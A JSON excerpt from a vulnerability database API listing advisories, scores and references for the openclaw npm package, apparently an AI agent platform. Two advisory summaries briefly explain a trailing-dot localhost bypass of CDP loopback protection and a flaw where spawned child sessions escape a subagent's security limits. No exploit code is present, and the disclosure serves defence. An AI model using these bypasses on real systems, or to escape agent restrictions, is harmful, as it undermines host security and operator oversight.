                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35635",
                "GHSA-rqp8-q22p-5j9q"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x9qg-8qk5-s3d6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90049?format=api",
            "vulnerability_id": "VCID-xfgw-ua7r-abbr",
            "summary": "OpenClaw: Trailing-dot localhost CDP hosts could bypass remote loopback protections\n## Summary\n\nBefore OpenClaw 2026.4.2, remote CDP discovery could return a trailing-dot localhost host such as `localhost.` and bypass OpenClaw's loopback-host normalization. That let a non-loopback remote CDP profile pivot the follow-up connection back onto localhost.\n\n## Impact\n\nA hostile discovery response could retarget authenticated browser control toward a localhost-resolving endpoint on the OpenClaw host. This weakened the existing remote-CDP loopback protection and could expose localhost-backed browser state.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9c22d636697336a6b22b0ae24798d8b8325d7828` — normalize localhost absolute-form CDP hosts before loopback checks\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41372",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1326",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13224",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13264",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41372"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41372",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41372"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fh32-73r9-rgh5",
                    "reference_id": "GHSA-fh32-73r9-rgh5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fh32-73r9-rgh5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41372",
                "GHSA-fh32-73r9-rgh5"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xfgw-ua7r-abbr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95118?format=api",
            "vulnerability_id": "VCID-xj73-kszs-yygp",
            "summary": "OpenClaw's ACP child sessions inherit subagent security envelope constraints\n## Summary\nIn affected versions, ACP child sessions could fail to inherit subagent security envelope constraints.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA restricted subagent spawning an ACP child session could fail to carry forward subagent-only constraints such as depth, child-count limits, control scope, or target-agent restrictions.\n\n## Fix\nACP spawn now resolves and persists child subagent envelope fields, enforces maximum depth and active-child caps, and applies the inherited control scope to child ACP sessions.\n\n## Fix Commit(s)\n- 31160dc069b7cc5d833b39c53736a41ad3befda2\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft, @qclawer, and @KeenSecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44997",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08411",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08403",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08423",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44997"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
